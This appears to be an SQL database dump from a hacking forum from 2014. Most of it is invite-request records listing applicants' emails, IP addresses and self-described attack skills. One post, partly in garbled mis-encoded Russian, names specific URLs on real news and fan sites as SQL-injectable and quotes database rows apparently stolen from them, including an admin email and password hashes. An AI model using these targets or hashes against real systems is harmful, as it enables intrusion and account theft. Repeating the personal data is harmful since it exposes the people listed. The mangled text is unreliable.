\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1487, 1346, 0, 'syslink', 13, 'Media', 1407700395, '[url]http://www.forbes.com/sites/quora/2014/07/24/how-wsjs-facebook-page-got-hacked-and-what-others-should-do-to-prevent-this/[/url]\r\n\r\n[url]http://www.forbes.com/sites/thomasbrewster/2014/07/14/russian-hacker-breaches-cnet-servers/[/url]', 1, 0, '', 0, 1, 0, 0, 0), (1488, 1347, 0, 'Invite', 2, '{$name}', 1407700460, '[SIZE=\'4\'][COLOR=\'Sienna\']masterseeker[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: null\n[b]e-mail[/b]: mstseeker@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.165.222.245\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://masterseeker.findmysoft.com | masterseeker.findmysoft.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1489, 1348, 0, 'Invite', 2, '{$name}', 1407700542, '[SIZE=\'4\'][COLOR=\'Sienna\']masterseeker[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: none\n[b]e-mail[/b]: mstseeker@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.165.222.245\n[*][b]real ip[/b]: 46.165.222.245\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://masterseeker.findmysoft.com | masterseeker.findmysoft.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1490, 1346, 1487, 'syslink', 13, '', 1407704532, '[url]http://arstechnica.com/security/2014/07/wsj-website-hacked-data-offered-for-sale-for-1-bitcoin/[/url]', 1, 0, '', 0, 1, 0, 0, 0), (1491, 1349, 0, 'Invite', 2, '{$name}', 1407704759, '[SIZE=\'4\'][COLOR=\'Sienna\']gh057[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: yobuddy@reallymymail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 84.2.105.71\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1492, 1350, 0, 'Invite', 2, '{$name}', 1407705004, '[SIZE=\'4\'][COLOR=\'Sienna\']Attachi[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 437844\n[b]e-mail[/b]: entferner@ya.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 37.78.199.213\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://attachi.com | attachi.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1493, 1351, 0, 'Invite', 2, '{$name}', 1407706766, '[SIZE=\'4\'][COLOR=\'Sienna\']mjrod5[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: dn44@jodo.im\n[b]e-mail[/b]: dasdasz3@yandex.com\n[b]Info[/b]: Experience coding c++/asm (malware),/php/js.\r\nKnows:\r\nxxe,xss,sqli,rfi,lfi,csrf,ssrf.\r\nhttp://www.ic0de.org/member.php?13265-mjrod5\r\nhttps://www.opensc.ws/members/mjrod5.html\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 185.31.136.244\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://mjrod5.deviantart.com | mjrod5.deviantart.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1494, 1352, 0, 'Invite', 2, '{$name}', 1407707519, '[SIZE=\'4\'][COLOR=\'Sienna\']Mr.MaGnoM[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: magnomdanszo@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 197.129.1.190\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/MrMaGnoM | https://twitter.com/MrMaGnoM \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1495, 1353, 0, 'Invite', 2, '{$name}', 1407710881, '[SIZE=\'4\'][COLOR=\'Sienna\']GB47[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: g.belhadj47\n[b]e-mail[/b]: gb47@msn.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.99.5.150\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2107.3 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1496, 1354, 0, 'Invite', 2, '{$name}', 1407714355, '[SIZE=\'4\'][COLOR=\'Sienna\']freeman007[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 123456\n[b]e-mail[/b]: abdelalichair007@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 159.253.145.183\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://freeman007.33bru.com | freeman007.33bru.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1497, 1355, 0, 'Invite', 2, '{$name}', 1407714805, '[SIZE=\'4\'][COLOR=\'Sienna\']0x4h4x[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: 0x4h4x@mail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 177.139.29.56\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://0x4h4x.deviantart.com | 0x4h4x.deviantart.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1498, 1356, 0, 'Invite', 2, '{$name}', 1407716363, '[SIZE=\'4\'][COLOR=\'Sienna\']brainfox[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: tc-h@live.com\n[b]Info[/b]: skills : web security since 2008 ,, now lot of language of programming like : php , python , perl , assembly , c , c#...\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.100.187.119\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/id169338184 | http://vk.com/id169338184 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1499, 1357, 0, 'Invite', 2, '{$name}', 1407726560, '[SIZE=\'4\'][COLOR=\'Sienna\']Filo Sous[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: marwan12300@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 105.157.171.92\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://forkingfoodie.blogspot.com/.../spinach-and-feta-filo-pie.html | http://forkingfoodie.blogspot.com/.../spinach-and-feta-filo-pie.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1500, 1358, 0, 'Invite', 2, '{$name}', 1407726659, '[SIZE=\'4\'][COLOR=\'Sienna\']Filo Sous[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: marwan12300@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 105.157.171.92\n[*][b]real ip[/b]: 105.157.171.92\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://forkingfoodie.blogspot.com/.../spinach-and-feta-filo-pie.html | http://forkingfoodie.blogspot.com/.../spinach-and-feta-filo-pie.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1501, 1359, 0, 'Invite', 2, '{$name}', 1407726746, '[SIZE=\'4\'][COLOR=\'Sienna\']Filo Sous[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: marwan12300@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 105.157.171.92\n[*][b]real ip[/b]: 105.157.171.92\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://forkingfoodie.blogspot.com/.../spinach-and-feta-filo-pie.html | http://forkingfoodie.blogspot.com/.../spinach-and-feta-filo-pie.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1502, 1360, 0, 'Invite', 2, '{$name}', 1407733286, '[SIZE=\'4\'][COLOR=\'Sienna\']Alai[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: prolixy@mail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 37.99.53.223\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://alai.ro | alai.ro \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1503, 1361, 0, 'Invite', 2, '{$name}', 1407733603, '[SIZE=\'4\'][COLOR=\'Sienna\']Tundra[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: prolixy@list.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 37.99.53.223\n[*][b]real ip[/b]: 37.99.53.223\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://tundra.aero | tundra.aero \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1504, 1362, 0, 'Invite', 2, '{$name}', 1407735917, '[SIZE=\'4\'][COLOR=\'Sienna\']drav0c[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: dravoc@blah.im\n[b]e-mail[/b]: dnsapps@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 74.120.13.132\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.wowprogress.com/user/Drav0c | http://www.wowprogress.com/user/Drav0c \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1505, 1363, 0, 'null', 9, 'Sql inj', 1407736309, 'ÃÂõÑÂúþûьúþ ÑÂúуûõù\r\nØýтõрõÑÂõý тõü чтþ ÑÂõрòõр ÿрøýðôûõöøт Huffingtonpost\r\n[QUOTE][url]http://ariannaonline-huffpost-ewr.evip.aol.com/columns/column.php?id=324[/url][/QUOTE]\r\n\r\nÚðúþù тþ ÑÂðùт free.fr\r\ninformation_sheme\r\n[QUOTE][url]http://animeasialyrics.free.fr/song_lyrics.php?id=9130[/url][/QUOTE]\r\n\r\nsmh.com.au\r\n[QUOTE][url]http://ultimate-footy.smh.com.au/ajax/ladder.php?l=142250[/url][/QUOTE]\r\náðüðѠøýтõрõÑÂýðѠ÷ðÿøÑÂÑŒ \r\n[QUOTE] 1 | 72R93592FA4992034 | Power | Ryan | [email]admin@ultimatefooty.com.au[/email] | 1 | 1 | 0 | 0 | 562b1ef2bc8577ab62c9fd179e7312ed63cac71a | NULL | 11 | power | 4233230f1704e1655cac1c882adb328875f31de6 | 0 | 1202040564 | 1 | T | 1 | | 1368776274 | NULL | | NULL | Power | 0 | NULL | theage | 1 | NULL | 0 [/QUOTE]\r\n\r\ntut.by ÑÂúуûю чõрõ÷ ÿü þтôðü ýуöôðющøüÑÂÑÂ))\r\n[QUOTE]| 20 | 1 | 1 | 1 | 1 | NULL | admin | 0000-00-00 00:00:00 | 0 | NULL | b47114c8e76d66c366b4a6f48dccd5c0 | [/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1506, 1364, 0, 'Invite', 2, '{$name}', 